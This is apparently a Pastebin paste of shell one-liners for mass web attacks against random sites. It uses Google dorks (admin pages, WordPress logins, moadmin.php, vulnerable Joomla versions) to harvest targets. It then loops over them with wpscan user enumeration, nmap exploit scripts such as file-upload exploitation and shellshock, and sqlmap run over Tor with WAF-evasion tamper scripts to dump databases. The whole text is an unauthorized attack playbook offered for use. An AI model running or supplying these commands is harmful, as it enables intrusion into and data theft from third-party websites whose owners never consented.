Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- atscan --random --dork inurl:/admin/ --level 100 --xss --lfi --wp
- atscan --random --dork inurl:.php? --level 100 --xss --lfi --wp
- atscan --random --dork inurl:wp-content/plugins/age-verification/age-verification.php --xss --lfi --wp
- atscan --random --dork "error_log" inurl:/wp-content --level 100 --xss --lfi --wp
- atscan --random --dork inurl:/node/add/announcement --level 100 --xss --lfi --wp
- atscan --random --dork inurl:wp-login.php Register Username Password -echo --level 100 --xss --lfi
- php inurl.php --dork 'inurl:/node/add/announcement' -s output.txt -q 1,2,4,6
- php inurl.php --dork 'inurl:wp-login.php Register Username Password -echo' -s output.txt -q 1,2,4,6 --command-all
- php inurl.php --dork '"powered by joomla 3.2" OR "powered by joomla 3.3" OR "powered by joomla 3.4"' -s output.txt -q 1,2,4,6
- php inurl.php --dork 'inurl:"index.php?option=com_jeajaxeventcalendar"' -s output.txt -q 1,2,4,6
- php inurl.php --dork 'inurl:moadmin.php' -s output.txt -q 1,2,4,6
- php inurl.php --dork 'inurl:moadmin.php?' -s output.txt -q 1,2,4,6
- php inurl.php --dork 'inurl:/cgi' -s output.txt -q 1,2,4,6
- for site in $(cat output/output.txt) ; do droopscan scan drupal -u $site ; done
- for site in $(cat output/output.txt) ; do droopscan scan wordpress -u $site ; done
- for site in $(cat output/output.txt) ; do wpscan --url $site --enumerate u ; done
- for site in $(cat output/output.txt) ; do wpscan --url $site --enumerate p ; done
- for site in $(cat output/output.txt) ; do droopscan scan joomla -u $site ; done
- for site in $(cat output/output.txt) ; do droopscan scan silverstripe -u $site ; done
- for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-wordpress-enum $site ; done
- for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-wordpress-users $site ; done
- for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-csrf $site ; done
- for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-sql-injection $site ; done
- for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-shellsock $site ; done
- for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-fileupload-exploiter $site ; done
- for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-robots.txt $site ; done
- for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-stored-xss $site ; done
- for site in $(cat output/output.txt) ; do nmap -v -sSV --script http-frontpage-login $site ; done
- SQLI
- for site in $(cat output/output.txt) ; do sqlmap --tor --url $site --random-agent --flush-session --level 3 --risk 3 --tamper charencode.py,modsecurityzeroversioned.py --batch --forms --dbs ; done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement